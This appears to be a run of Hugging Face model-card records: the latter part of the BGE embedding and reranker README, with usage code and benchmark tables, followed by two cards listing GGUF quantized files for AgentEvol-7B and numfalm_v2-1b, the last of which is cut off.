| [BAAI/bge-base-zh-v1.5](https://huggingface.co/BAAI/bge-base-zh-v1.5) | Chinese | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | version 1.5 with more reasonable similarity distribution | `为这个句子生成表示以用于检索相关文章:` |
| [BAAI/bge-small-zh-v1.5](https://huggingface.co/BAAI/bge-small-zh-v1.5) | Chinese | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | version 1.5 with more reasonable similarity distribution | `为这个句子生成表示以用于检索相关文章:` |
| [BAAI/bge-large-en](https://huggingface.co/BAAI/bge-large-en) | English | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | :trophy: rank **1st** in [MTEB](https://huggingface.co/spaces/mteb/leaderboard) leaderboard | `Represent this sentence for searching relevant passages: ` |
| [BAAI/bge-base-en](https://huggingface.co/BAAI/bge-base-en) | English | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | a base-scale model but with similar ability to `bge-large-en` | `Represent this sentence for searching relevant passages: ` |
| [BAAI/bge-small-en](https://huggingface.co/BAAI/bge-small-en) | English | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) |a small-scale model but with competitive performance | `Represent this sentence for searching relevant passages: ` |
| [BAAI/bge-large-zh](https://huggingface.co/BAAI/bge-large-zh) | Chinese | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | :trophy: rank **1st** in [C-MTEB](https://github.com/FlagOpen/FlagEmbedding/tree/master/C_MTEB) benchmark | `为这个句子生成表示以用于检索相关文章:` |
| [BAAI/bge-base-zh](https://huggingface.co/BAAI/bge-base-zh) | Chinese | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | a base-scale model but with similar ability to `bge-large-zh` | `为这个句子生成表示以用于检索相关文章:` |
| [BAAI/bge-small-zh](https://huggingface.co/BAAI/bge-small-zh) | Chinese | [Inference](#usage-for-embedding-model) [Fine-tune](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) | a small-scale model but with competitive performance | `为这个句子生成表示以用于检索相关文章:` |
[1\]: If you need to search for passages relevant to a query, we suggest adding the instruction to the query; in other cases, no instruction is needed, just use the original query directly. In all cases, **no instruction** needs to be added to passages.
[2\]: Different from the embedding model, the reranker takes a question and a document as input and directly outputs a similarity score instead of an embedding. To balance accuracy and time cost, a cross-encoder is widely used to re-rank the top-k documents retrieved by other, simpler models.
For example, use the bge embedding model to retrieve the top 100 relevant documents, then use the bge reranker to re-rank those 100 documents and obtain the final top-3 results, as in the sketch below.
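A minimal retrieve-then-rerank sketch using the `FlagEmbedding` classes described in [Usage](#usage) below (the two-passage corpus and the top-k sizes here are only illustrative):
```python
import numpy as np
from FlagEmbedding import FlagModel, FlagReranker

query = "what is a panda?"
corpus = [
    "The giant panda (Ailuropoda melanoleuca) is a bear species endemic to China.",
    "Paris is the capital of France.",
]

# 1) retrieve candidates with the bi-encoder (embedding model)
embedder = FlagModel('BAAI/bge-large-en-v1.5',
                     query_instruction_for_retrieval="Represent this sentence for searching relevant passages: ",
                     use_fp16=True)
q_emb = embedder.encode_queries([query])
p_emb = embedder.encode(corpus)
retrieval_scores = (q_emb @ p_emb.T)[0]
candidate_ids = np.argsort(retrieval_scores)[::-1][:100]  # keep up to the top 100 candidates

# 2) re-rank the candidates with the cross-encoder and keep the final top 3
reranker = FlagReranker('BAAI/bge-reranker-large', use_fp16=True)
rerank_scores = reranker.compute_score([[query, corpus[i]] for i in candidate_ids])
top3 = [corpus[candidate_ids[j]] for j in np.argsort(rerank_scores)[::-1][:3]]
print(top3)
```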
All models have been uploaded to the Hugging Face Hub and can be found at https://huggingface.co/BAAI.
If you cannot access the Hugging Face Hub, you can also download the models at https://model.baai.ac.cn/models .
## Frequently asked questions
<details>
<summary>1. How to fine-tune bge embedding model?</summary>
<!-- ### How to fine-tune bge embedding model? -->
Follow this [example](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune) to prepare data and fine-tune your model.
Some suggestions:
- Mine hard negatives following this [example](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune#hard-negatives), which can improve the retrieval performance.
- If you pre-train bge on your data, the pre-trained model cannot be directly used to calculate similarity, and it must be fine-tuned with contrastive learning before computing similarity.
- If the accuracy of the fine-tuned model is still not high, it is recommended to use/fine-tune the cross-encoder model (bge-reranker) to re-rank the top-k results. Hard negatives are also needed to fine-tune the reranker.
</details>
<details>
<summary>2. The similarity score between two dissimilar sentences is higher than 0.5</summary>
<!-- ### The similarity score between two dissimilar sentences is higher than 0.5 -->
**We suggest using bge v1.5, which alleviates the issue of the similarity distribution.**
Since we fine-tune the models with contrastive learning using a temperature of 0.01,
the similarity distribution of the current BGE model is roughly in the interval \[0.6, 1\].
Consequently, a similarity score greater than 0.5 does not indicate that the two sentences are similar.
For downstream tasks, such as passage retrieval or semantic similarity,
**what matters is the relative order of the scores, not the absolute value.**
If you need to filter similar sentences based on a similarity threshold,
please select an appropriate similarity threshold based on the similarity distribution on your data (such as 0.8, 0.85, or even 0.9).
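For instance, a minimal sketch of threshold-based filtering (the 0.85 threshold is purely illustrative; pick it from the score distribution on your own data):
```python
from sentence_transformers import SentenceTransformer

model = SentenceTransformer('BAAI/bge-large-zh-v1.5')
pairs = [("样例数据-1", "样例数据-2"), ("样例数据-1", "样例数据-3")]
threshold = 0.85  # illustrative value, not a universal one

emb_a = model.encode([a for a, _ in pairs], normalize_embeddings=True)
emb_b = model.encode([b for _, b in pairs], normalize_embeddings=True)
cosine = (emb_a * emb_b).sum(axis=1)  # row-wise dot product of normalized vectors = cosine similarity

similar_pairs = [(a, b, float(s)) for (a, b), s in zip(pairs, cosine) if s >= threshold]
print(similar_pairs)
```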
</details>
<details>
<summary>3. When does the query instruction need to be used</summary>
<!-- ### When does the query instruction need to be used -->
For `bge-*-v1.5`, we improved the retrieval ability when no instruction is used.
Using no instruction causes only a slight degradation in retrieval performance compared with using an instruction,
so for convenience you can generate embeddings without an instruction in all cases.
For a retrieval task that uses short queries to find long related documents,
it is recommended to add instructions for these short queries.
**The best method to decide whether to add instructions for queries is choosing the setting that achieves better performance on your task.**
In all cases, no instruction needs to be added to the documents/passages; a small sketch comparing the two query settings is shown below.
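This sketch assumes the `FlagModel` usage shown in [Usage](#usage); the data is only a placeholder:
```python
from FlagEmbedding import FlagModel

model = FlagModel('BAAI/bge-large-zh-v1.5',
                  query_instruction_for_retrieval="为这个句子生成表示以用于检索相关文章:")
queries = ['query_1', 'query_2']
passages = ["样例文档-1", "样例文档-2"]

p_embeddings = model.encode(passages)  # passages never get the instruction
scores_with_instruction = model.encode_queries(queries) @ p_embeddings.T  # instruction added automatically
scores_without_instruction = model.encode(queries) @ p_embeddings.T       # plain queries

# evaluate both score matrices on your retrieval task and keep the setting that performs better
```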
</details>
## Usage
### Usage for Embedding Model
Here are some examples for using `bge` models with
[FlagEmbedding](#using-flagembedding), [Sentence-Transformers](#using-sentence-transformers), [Langchain](#using-langchain), or [Huggingface Transformers](#using-huggingface-transformers).
#### Using FlagEmbedding
```
pip install -U FlagEmbedding
```
If this doesn't work for you, see [FlagEmbedding](https://github.com/FlagOpen/FlagEmbedding/blob/master/FlagEmbedding/baai_general_embedding/README.md) for other ways to install FlagEmbedding.
```python
from FlagEmbedding import FlagModel
sentences_1 = ["样例数据-1", "样例数据-2"]
sentences_2 = ["样例数据-3", "样例数据-4"]
model = FlagModel('BAAI/bge-large-zh-v1.5',
query_instruction_for_retrieval="为这个句子生成表示以用于检索相关文章:",
use_fp16=True) # Setting use_fp16 to True speeds up computation with a slight performance degradation
embeddings_1 = model.encode(sentences_1)
embeddings_2 = model.encode(sentences_2)
similarity = embeddings_1 @ embeddings_2.T
print(similarity)
# for an s2p (short query to long passage) retrieval task, we suggest using encode_queries(), which automatically adds the instruction to each query
# the corpus in a retrieval task can still use encode() or encode_corpus(), since passages do not need the instruction
queries = ['query_1', 'query_2']
passages = ["样例文档-1", "样例文档-2"]
q_embeddings = model.encode_queries(queries)
p_embeddings = model.encode(passages)
scores = q_embeddings @ p_embeddings.T
```
For the value of the argument `query_instruction_for_retrieval`, see [Model List](https://github.com/FlagOpen/FlagEmbedding/tree/master#model-list).
By default, FlagModel uses all available GPUs when encoding. Set `os.environ["CUDA_VISIBLE_DEVICES"]` to select specific GPUs,
or set `os.environ["CUDA_VISIBLE_DEVICES"]=""` to make all GPUs unavailable.
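For example (a minimal sketch; set the environment variable before the model is constructed):
```python
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"  # encode only on GPU 0 and GPU 1
# os.environ["CUDA_VISIBLE_DEVICES"] = ""   # make all GPUs unavailable (CPU only)

from FlagEmbedding import FlagModel
model = FlagModel('BAAI/bge-large-zh-v1.5', use_fp16=True)
```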
#### Using Sentence-Transformers
You can also use the `bge` models with [sentence-transformers](https://www.SBERT.net):
```
pip install -U sentence-transformers
```
```python
from sentence_transformers import SentenceTransformer
sentences_1 = ["样例数据-1", "样例数据-2"]
sentences_2 = ["样例数据-3", "样例数据-4"]
model = SentenceTransformer('BAAI/bge-large-zh-v1.5')
embeddings_1 = model.encode(sentences_1, normalize_embeddings=True)
embeddings_2 = model.encode(sentences_2, normalize_embeddings=True)
similarity = embeddings_1 @ embeddings_2.T
print(similarity)
```
For an s2p (short query to long passage) retrieval task,
each short query should start with an instruction (see the [Model List](https://github.com/FlagOpen/FlagEmbedding/tree/master#model-list) for the instructions).
The instruction is not needed for passages.
```python
from sentence_transformers import SentenceTransformer
queries = ['query_1', 'query_2']
passages = ["样例文档-1", "样例文档-2"]
instruction = "为这个句子生成表示以用于检索相关文章:"
model = SentenceTransformer('BAAI/bge-large-zh-v1.5')
q_embeddings = model.encode([instruction+q for q in queries], normalize_embeddings=True)
p_embeddings = model.encode(passages, normalize_embeddings=True)
scores = q_embeddings @ p_embeddings.T
```
#### Using Langchain
You can use `bge` in LangChain like this:
```python
from langchain.embeddings import HuggingFaceBgeEmbeddings
model_name = "BAAI/bge-large-en-v1.5"
model_kwargs = {'device': 'cuda'}
encode_kwargs = {'normalize_embeddings': True} # set True to compute cosine similarity
model = HuggingFaceBgeEmbeddings(
model_name=model_name,
model_kwargs=model_kwargs,
encode_kwargs=encode_kwargs,
query_instruction="为这个句子生成表示以用于检索相关文章:"
)
model.query_instruction = "为这个句子生成表示以用于检索相关文章:"
```
#### Using HuggingFace Transformers
With the transformers package, you can use the model like this: First, you pass your input through the transformer model, then you select the last hidden state of the first token (i.e., [CLS]) as the sentence embedding.
```python
from transformers import AutoTokenizer, AutoModel
import torch
# Sentences we want sentence embeddings for
sentences = ["样例数据-1", "样例数据-2"]
# Load model from HuggingFace Hub
tokenizer = AutoTokenizer.from_pretrained('BAAI/bge-large-zh-v1.5')
model = AutoModel.from_pretrained('BAAI/bge-large-zh-v1.5')
model.eval()
# Tokenize sentences
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
# for an s2p (short query to long passage) retrieval task, add an instruction to each query (do not add instructions to passages)
# encoded_input = tokenizer([instruction + q for q in queries], padding=True, truncation=True, return_tensors='pt')
# Compute token embeddings
with torch.no_grad():
model_output = model(**encoded_input)
# Perform pooling. In this case, cls pooling.
sentence_embeddings = model_output[0][:, 0]
# normalize embeddings
sentence_embeddings = torch.nn.functional.normalize(sentence_embeddings, p=2, dim=1)
print("Sentence embeddings:", sentence_embeddings)
```
### Usage for Reranker
Different from the embedding model, the reranker takes a question and a document as input and directly outputs a similarity score instead of an embedding.
You can get a relevance score by feeding a query and a passage to the reranker.
The reranker is optimized with cross-entropy loss, so the relevance score is not bounded to a specific range.
#### Using FlagEmbedding
```
pip install -U FlagEmbedding
```
Get relevance scores (higher scores indicate more relevance):
```python
from FlagEmbedding import FlagReranker
reranker = FlagReranker('BAAI/bge-reranker-large', use_fp16=True) # Setting use_fp16 to True speeds up computation with a slight performance degradation
score = reranker.compute_score(['query', 'passage'])
print(score)
scores = reranker.compute_score([['what is panda?', 'hi'], ['what is panda?', 'The giant panda (Ailuropoda melanoleuca), sometimes called a panda bear or simply panda, is a bear species endemic to China.']])
print(scores)
```
#### Using Huggingface transformers
```python
import torch
from transformers import AutoModelForSequenceClassification, AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained('BAAI/bge-reranker-large')
model = AutoModelForSequenceClassification.from_pretrained('BAAI/bge-reranker-large')
model.eval()
pairs = [['what is panda?', 'hi'], ['what is panda?', 'The giant panda (Ailuropoda melanoleuca), sometimes called a panda bear or simply panda, is a bear species endemic to China.']]
with torch.no_grad():
inputs = tokenizer(pairs, padding=True, truncation=True, return_tensors='pt', max_length=512)
scores = model(**inputs, return_dict=True).logits.view(-1, ).float()
print(scores)
```
## Evaluation
`baai-general-embedding` models achieve **state-of-the-art performance on both the MTEB and C-MTEB leaderboards!**
For more details and evaluation tools, see our [scripts](https://github.com/FlagOpen/FlagEmbedding/blob/master/C_MTEB/README.md).
- **MTEB**:
| Model Name | Dimension | Sequence Length | Average (56) | Retrieval (15) |Clustering (11) | Pair Classification (3) | Reranking (4) | STS (10) | Summarization (1) | Classification (12) |
|:----:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|
| [BAAI/bge-large-en-v1.5](https://huggingface.co/BAAI/bge-large-en-v1.5) | 1024 | 512 | **64.23** | **54.29** | 46.08 | 87.12 | 60.03 | 83.11 | 31.61 | 75.97 |
| [BAAI/bge-base-en-v1.5](https://huggingface.co/BAAI/bge-base-en-v1.5) | 768 | 512 | 63.55 | 53.25 | 45.77 | 86.55 | 58.86 | 82.4 | 31.07 | 75.53 |
| [BAAI/bge-small-en-v1.5](https://huggingface.co/BAAI/bge-small-en-v1.5) | 384 | 512 | 62.17 |51.68 | 43.82 | 84.92 | 58.36 | 81.59 | 30.12 | 74.14 |
| [bge-large-en](https://huggingface.co/BAAI/bge-large-en) | 1024 | 512 | 63.98 | 53.9 | 46.98 | 85.8 | 59.48 | 81.56 | 32.06 | 76.21 |
| [bge-base-en](https://huggingface.co/BAAI/bge-base-en) | 768 | 512 | 63.36 | 53.0 | 46.32 | 85.86 | 58.7 | 81.84 | 29.27 | 75.27 |
| [gte-large](https://huggingface.co/thenlper/gte-large) | 1024 | 512 | 63.13 | 52.22 | 46.84 | 85.00 | 59.13 | 83.35 | 31.66 | 73.33 |
| [gte-base](https://huggingface.co/thenlper/gte-base) | 768 | 512 | 62.39 | 51.14 | 46.2 | 84.57 | 58.61 | 82.3 | 31.17 | 73.01 |
| [e5-large-v2](https://huggingface.co/intfloat/e5-large-v2) | 1024| 512 | 62.25 | 50.56 | 44.49 | 86.03 | 56.61 | 82.05 | 30.19 | 75.24 |
| [bge-small-en](https://huggingface.co/BAAI/bge-small-en) | 384 | 512 | 62.11 | 51.82 | 44.31 | 83.78 | 57.97 | 80.72 | 30.53 | 74.37 |
| [instructor-xl](https://huggingface.co/hkunlp/instructor-xl) | 768 | 512 | 61.79 | 49.26 | 44.74 | 86.62 | 57.29 | 83.06 | 32.32 | 61.79 |
| [e5-base-v2](https://huggingface.co/intfloat/e5-base-v2) | 768 | 512 | 61.5 | 50.29 | 43.80 | 85.73 | 55.91 | 81.05 | 30.28 | 73.84 |
| [gte-small](https://huggingface.co/thenlper/gte-small) | 384 | 512 | 61.36 | 49.46 | 44.89 | 83.54 | 57.7 | 82.07 | 30.42 | 72.31 |
| [text-embedding-ada-002](https://platform.openai.com/docs/guides/embeddings) | 1536 | 8192 | 60.99 | 49.25 | 45.9 | 84.89 | 56.32 | 80.97 | 30.8 | 70.93 |
| [e5-small-v2](https://huggingface.co/intfloat/e5-base-v2) | 384 | 512 | 59.93 | 49.04 | 39.92 | 84.67 | 54.32 | 80.39 | 31.16 | 72.94 |
| [sentence-t5-xxl](https://huggingface.co/sentence-transformers/sentence-t5-xxl) | 768 | 512 | 59.51 | 42.24 | 43.72 | 85.06 | 56.42 | 82.63 | 30.08 | 73.42 |
| [all-mpnet-base-v2](https://huggingface.co/sentence-transformers/all-mpnet-base-v2) | 768 | 514 | 57.78 | 43.81 | 43.69 | 83.04 | 59.36 | 80.28 | 27.49 | 65.07 |
| [sgpt-bloom-7b1-msmarco](https://huggingface.co/bigscience/sgpt-bloom-7b1-msmarco) | 4096 | 2048 | 57.59 | 48.22 | 38.93 | 81.9 | 55.65 | 77.74 | 33.6 | 66.19 |
- **C-MTEB**:
We created the C-MTEB benchmark for Chinese text embedding, which consists of 31 datasets from 6 tasks.
Please refer to [C_MTEB](https://github.com/FlagOpen/FlagEmbedding/blob/master/C_MTEB/README.md) for a detailed introduction.
| Model | Embedding dimension | Avg | Retrieval | STS | PairClassification | Classification | Reranking | Clustering |
|:-------------------------------|:--------:|:--------:|:--------:|:--------:|:--------:|:--------:|:--------:|:--------:|
| [**BAAI/bge-large-zh-v1.5**](https://huggingface.co/BAAI/bge-large-zh-v1.5) | 1024 | **64.53** | 70.46 | 56.25 | 81.6 | 69.13 | 65.84 | 48.99 |
| [BAAI/bge-base-zh-v1.5](https://huggingface.co/BAAI/bge-base-zh-v1.5) | 768 | 63.13 | 69.49 | 53.72 | 79.75 | 68.07 | 65.39 | 47.53 |
| [BAAI/bge-small-zh-v1.5](https://huggingface.co/BAAI/bge-small-zh-v1.5) | 512 | 57.82 | 61.77 | 49.11 | 70.41 | 63.96 | 60.92 | 44.18 |
| [BAAI/bge-large-zh](https://huggingface.co/BAAI/bge-large-zh) | 1024 | 64.20 | 71.53 | 54.98 | 78.94 | 68.32 | 65.11 | 48.39 |
| [bge-large-zh-noinstruct](https://huggingface.co/BAAI/bge-large-zh-noinstruct) | 1024 | 63.53 | 70.55 | 53 | 76.77 | 68.58 | 64.91 | 50.01 |
| [BAAI/bge-base-zh](https://huggingface.co/BAAI/bge-base-zh) | 768 | 62.96 | 69.53 | 54.12 | 77.5 | 67.07 | 64.91 | 47.63 |
| [multilingual-e5-large](https://huggingface.co/intfloat/multilingual-e5-large) | 1024 | 58.79 | 63.66 | 48.44 | 69.89 | 67.34 | 56.00 | 48.23 |
| [BAAI/bge-small-zh](https://huggingface.co/BAAI/bge-small-zh) | 512 | 58.27 | 63.07 | 49.45 | 70.35 | 63.64 | 61.48 | 45.09 |
| [m3e-base](https://huggingface.co/moka-ai/m3e-base) | 768 | 57.10 | 56.91 | 50.47 | 63.99 | 67.52 | 59.34 | 47.68 |
| [m3e-large](https://huggingface.co/moka-ai/m3e-large) | 1024 | 57.05 | 54.75 | 50.42 | 64.3 | 68.2 | 59.66 | 48.88 |
| [multilingual-e5-base](https://huggingface.co/intfloat/multilingual-e5-base) | 768 | 55.48 | 61.63 | 46.49 | 67.07 | 65.35 | 54.35 | 40.68 |
| [multilingual-e5-small](https://huggingface.co/intfloat/multilingual-e5-small) | 384 | 55.38 | 59.95 | 45.27 | 66.45 | 65.85 | 53.86 | 45.26 |
| [text-embedding-ada-002(OpenAI)](https://platform.openai.com/docs/guides/embeddings/what-are-embeddings) | 1536 | 53.02 | 52.0 | 43.35 | 69.56 | 64.31 | 54.28 | 45.68 |
| [luotuo](https://huggingface.co/silk-road/luotuo-bert-medium) | 1024 | 49.37 | 44.4 | 42.78 | 66.62 | 61 | 49.25 | 44.39 |
| [text2vec-base](https://huggingface.co/shibing624/text2vec-base-chinese) | 768 | 47.63 | 38.79 | 43.41 | 67.41 | 62.19 | 49.45 | 37.66 |
| [text2vec-large](https://huggingface.co/GanymedeNil/text2vec-large-chinese) | 1024 | 47.36 | 41.94 | 44.97 | 70.86 | 60.66 | 49.16 | 30.02 |
- **Reranking**:
See [C_MTEB](https://github.com/FlagOpen/FlagEmbedding/blob/master/C_MTEB/) for evaluation script.
| Model | T2Reranking | T2RerankingZh2En\* | T2RerankingEn2Zh\* | MMarcoReranking | CMedQAv1 | CMedQAv2 | Avg |
|:-------------------------------|:--------:|:--------:|:--------:|:--------:|:--------:|:--------:|:--------:|
| text2vec-base-multilingual | 64.66 | 62.94 | 62.51 | 14.37 | 48.46 | 48.6 | 50.26 |
| multilingual-e5-small | 65.62 | 60.94 | 56.41 | 29.91 | 67.26 | 66.54 | 57.78 |
| multilingual-e5-large | 64.55 | 61.61 | 54.28 | 28.6 | 67.42 | 67.92 | 57.4 |
| multilingual-e5-base | 64.21 | 62.13 | 54.68 | 29.5 | 66.23 | 66.98 | 57.29 |
| m3e-base | 66.03 | 62.74 | 56.07 | 17.51 | 77.05 | 76.76 | 59.36 |
| m3e-large | 66.13 | 62.72 | 56.1 | 16.46 | 77.76 | 78.27 | 59.57 |
| bge-base-zh-v1.5 | 66.49 | 63.25 | 57.02 | 29.74 | 80.47 | 84.88 | 63.64 |
| bge-large-zh-v1.5 | 65.74 | 63.39 | 57.03 | 28.74 | 83.45 | 85.44 | 63.97 |
| [BAAI/bge-reranker-base](https://huggingface.co/BAAI/bge-reranker-base) | 67.28 | 63.95 | 60.45 | 35.46 | 81.26 | 84.1 | 65.42 |
| [BAAI/bge-reranker-large](https://huggingface.co/BAAI/bge-reranker-large) | 67.6 | 64.03 | 61.44 | 37.16 | 82.15 | 84.18 | 66.09 |
\* : T2RerankingZh2En and T2RerankingEn2Zh are cross-language retrieval tasks
## Train
### BAAI Embedding
We pre-train the models using [retromae](https://github.com/staoxiao/RetroMAE) and train them on large-scale pair data using contrastive learning.
**You can fine-tune the embedding model on your data following our [examples](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/finetune).**
We also provide a [pre-train example](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/pretrain).
Note that the goal of pre-training is to reconstruct the text; the pre-trained model cannot be used for similarity calculation directly and needs to be fine-tuned.
For more training details of bge, see [baai_general_embedding](https://github.com/FlagOpen/FlagEmbedding/blob/master/FlagEmbedding/baai_general_embedding/README.md).
### BGE Reranker
The cross-encoder performs full attention over the input pair,
which is more accurate than the embedding model (i.e., bi-encoder) but more time-consuming.
Therefore, it can be used to re-rank the top-k documents returned by the embedding model.
We train the cross-encoder on multilingual pair data.
The data format is the same as for the embedding model, so you can fine-tune it easily following our [example](https://github.com/FlagOpen/FlagEmbedding/tree/master/examples/reranker).
For more details, please refer to [./FlagEmbedding/reranker/README.md](https://github.com/FlagOpen/FlagEmbedding/tree/master/FlagEmbedding/reranker)
## Contact
If you have any questions or suggestions related to this project, feel free to open an issue or pull request.
You can also email Shitao Xiao ([email protected]) and Zheng Liu ([email protected]).
## Citation
If you find this repository useful, please consider giving it a star :star: and a citation.
```
@misc{bge_embedding,
title={C-Pack: Packaged Resources To Advance General Chinese Embedding},
author={Shitao Xiao and Zheng Liu and Peitian Zhang and Niklas Muennighoff},
year={2023},
eprint={2309.07597},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
## License
FlagEmbedding is licensed under the [MIT License](https://github.com/FlagOpen/FlagEmbedding/blob/master/LICENSE). The released models can be used for commercial purposes free of charge.
|
mradermacher/AgentEvol-7B-GGUF | mradermacher | "2024-06-06T15:05:18Z" | 3,602 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:AgentGym/AgentEvol-7B",
"endpoints_compatible",
"region:us"
] | null | "2024-06-06T13:42:09Z" | ---
base_model: AgentGym/AgentEvol-7B
language:
- en
library_name: transformers
quantized_by: mradermacher
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/AgentGym/AgentEvol-7B
<!-- provided-files -->
weighted/imatrix quants do not seem to be available (from me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q2_K.gguf) | Q2_K | 2.6 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.IQ3_XS.gguf) | IQ3_XS | 2.9 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.IQ3_S.gguf) | IQ3_S | 3.0 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q3_K_S.gguf) | Q3_K_S | 3.0 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.IQ3_M.gguf) | IQ3_M | 3.2 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q3_K_M.gguf) | Q3_K_M | 3.4 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q3_K_L.gguf) | Q3_K_L | 3.7 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.IQ4_XS.gguf) | IQ4_XS | 3.7 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q4_K_S.gguf) | Q4_K_S | 4.0 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q4_K_M.gguf) | Q4_K_M | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q5_K_S.gguf) | Q5_K_S | 4.8 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q5_K_M.gguf) | Q5_K_M | 4.9 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q6_K.gguf) | Q6_K | 5.6 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q8_0.gguf) | Q8_0 | 7.3 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.f16.gguf) | f16 | 13.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
RichardErkhov/numfa_-_numfalm_v2-1b-gguf | RichardErkhov | "2024-06-23T18:07:37Z" | 3,602 | 0 | null | [
"gguf",
"region:us"
] | null | "2024-06-23T17:57:00Z" | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
numfalm_v2-1b - GGUF
- Model creator: https://huggingface.co/numfa/
- Original model: https://huggingface.co/numfa/numfalm_v2-1b/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [numfalm_v2-1b.Q2_K.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q2_K.gguf) | Q2_K | 0.55GB |
| [numfalm_v2-1b.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.IQ3_XS.gguf) | IQ3_XS | 0.61GB |
| [numfalm_v2-1b.IQ3_S.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.IQ3_S.gguf) | IQ3_S | 0.63GB |
| [numfalm_v2-1b.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q3_K_S.gguf) | Q3_K_S | 0.63GB |
| [numfalm_v2-1b.IQ3_M.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.IQ3_M.gguf) | IQ3_M | 0.66GB |
| [numfalm_v2-1b.Q3_K.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q3_K.gguf) | Q3_K | 0.68GB |
| [numfalm_v2-1b.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q3_K_M.gguf) | Q3_K_M | 0.68GB |
| [numfalm_v2-1b.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q3_K_L.gguf) | Q3_K_L | 0.72GB |
| [numfalm_v2-1b.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.IQ4_XS.gguf) | IQ4_XS | 0.73GB |
